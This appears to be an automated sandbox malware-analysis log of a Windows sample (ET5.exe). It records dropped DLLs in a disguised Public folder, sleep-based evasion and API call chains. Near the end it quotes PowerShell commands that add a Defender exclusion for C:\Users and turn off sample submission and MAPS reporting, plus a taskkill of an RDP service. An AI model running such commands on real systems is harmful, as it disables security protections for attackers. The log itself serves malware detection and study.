Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,22_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9152BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BA502BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFAB1D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB82278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7085Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2656Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6702Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2980Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5903Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3867Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 3609
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 4778
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\L0FsI2PIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\rVtDGbMQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\gBXHuZY0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\erT926zeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\rmcjgYnLJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\y8J74cEHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\ypqwg32tJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\fYg6Jeg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\3rVpJMV7Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_22-58679
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-10214
Source: C:\Users\user\Desktop\ET5.exe TID: 6468Thread sleep time: -32520000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep count: 7085 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep count: 2656 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep count: 6702 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep count: 2980 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440Thread sleep count: 5903 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep count: 3867 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5160Thread sleep count: 163 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5160Thread sleep time: -81500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1680Thread sleep count: 181 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1680Thread sleep time: -90500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5464Thread sleep count: 85 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep count: 3609 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep time: -10827000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep count: 4778 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1848Thread sleep time: -14334000s >= -30000s
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\ET5.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF704893DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,11_2_00007FF704893DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708871CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF708871CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFAB31F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFAB31F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\user\Desktop\ET5.exeThread delayed: delay time: 120000Jump to behavior
Source: main.exe, 00000016.00000002.4540383274.000001B9FFCDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll80
Source: ET5.exe, 00000002.00000002.4527793606.0000000001697000.00000004.00000020.00020000.00000000.sdmp, j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415604789.0000029EDA313000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2357216162.000001B9FFCFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ET5.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,11_2_00007FF70489FF1F
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048945D5 fopen,_fsopen,fseek,_errno,_errno,_errno,_errno,_errno,_errno,_errno,_errno,ftell,_errno,_errno,_errno,_errno,fseek,fread,_errno,_errno,_errno,_errno,GetProcessHeap,HeapAlloc,_errno,_errno,_errno,_errno,GetProcessHeap,HeapFree,fclose,11_2_00007FF7048945D5
Source: C:\Users\user\Desktop\ET5.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF704891131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,11_2_00007FF704891131
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048A05D9 SetUnhandledExceptionFilter,11_2_00007FF7048A05D9
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048AB6B8 QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,11_2_00007FF7048AB6B8
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048AB668 IsDBCSLeadByteEx,OpenProcess,QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,WideCharToMultiByte,11_2_00007FF7048AB668
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708871131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,22_2_00007FF708871131

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,11_2_00007FF70489292E
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
